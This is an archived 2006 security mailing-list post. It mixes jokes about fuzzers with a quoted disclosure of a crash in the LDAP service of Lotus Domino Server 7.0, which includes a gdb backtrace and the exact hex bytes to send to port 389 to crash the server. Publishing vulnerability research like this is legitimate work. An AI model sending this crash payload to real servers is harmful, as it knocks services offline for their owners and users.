[Dailydave] ProtoVer vs Lotus Domino Server 7.0

Dave Aitel dave.aitel at gmail.com
Sat Feb 4 13:36:49 EST 2006 

Ah the smell of 0day in the morning. There's nothing like it! It's like a
New Zealand sauvignon blanc, the Sticky Fingers bakery early in the morning,
or the bum who sleeps outside of Wild Oats, drunk off of month old organic
groceries.

One of the reporters on this list should do a paper on "why do fuzzers still
work?" Surely if you're implementing a complex protocol of some sort and you
follow this new fangled "test driven development" fad, then clearly you've
written a few fuzzers in your time. But as Evgeny's latest entry shows:
fuzzers are still more fun than a botnet on all of your ex's computers.
Well, maybe not MORE fun. But nearly as fun. Well, pretty damn fun, anyways.

In my opinion, the main benefit to writing your own fuzzer as opposed to
using SPIKE is that you do get that mutli-dimentionality that !Dmitry made
fun of in his weblog entry. Of course, the downside to not using SPIKE is
that it takes quite a bit of time and effort, and hence, these sorts of
things tend to cost some cash.

But that doesn't explain why Microsoft's HTTP fuzzer is clearly not as up to
speed as Tom Ferris's. When is Steve going to knock some heads on this one?
Probably sometime last week, right after the POC came out. Ah to be a fly on
the wall of that conference room. Cause getting schooled by people who work
for free is so...well let's just say it doesn't happen to Marines very
often.

-dave




On 2/3/06, Evgeny Legerov <admin at gleg.net> wrote:
>
> Hi,
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1721508944 (LWP 17444)]
> 0x08068579 in CLDAPProtocol::StateBind ()
> (gdb) bt
> #0  0x08068579 in CLDAPProtocol::StateBind ()
> #1  0x0805c413 in CLDAPProtocol::Run ()
> #2  0x0809523c in CBaseTask::StateMachine ()
> #3  0x0805a12d in CLDAPSrv::OnConnect ()
> #4  0x08092618 in CIServ::ServerTaskProtocolMachine ()
> #5  0x08091d1a in CIServ::ServerTaskIOCP ()
> #6  0x08090dc8 in ServerThread ()
> #7  0x9ff49826 in ThreadWrapper () from
> /opt/ibm/lotus/notes/latest/linux/libnotes.so
> #8  0x9fdfab80 in start_thread () from
> /lib/libpthread.so.0
> #9  0x9fc9ddee in clone () from /lib/libc.so.6
> (gdb) x/i $eip
> 0x8068579 <_ZN13CLDAPProtocol9StateBindEv+749>: cmpb
>   $0x0,0x0
>
> To trigger send the following data to 389 port:
> """
> 30 0c 02 01 01 60 07 02 00 03 04 00 80 00
> """"
>
> Best regards,
> Evgeny Legerov
> CEO, GLEG Ltd.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20060204/81184af8/attachment.htm

More information about the Dailydave mailing list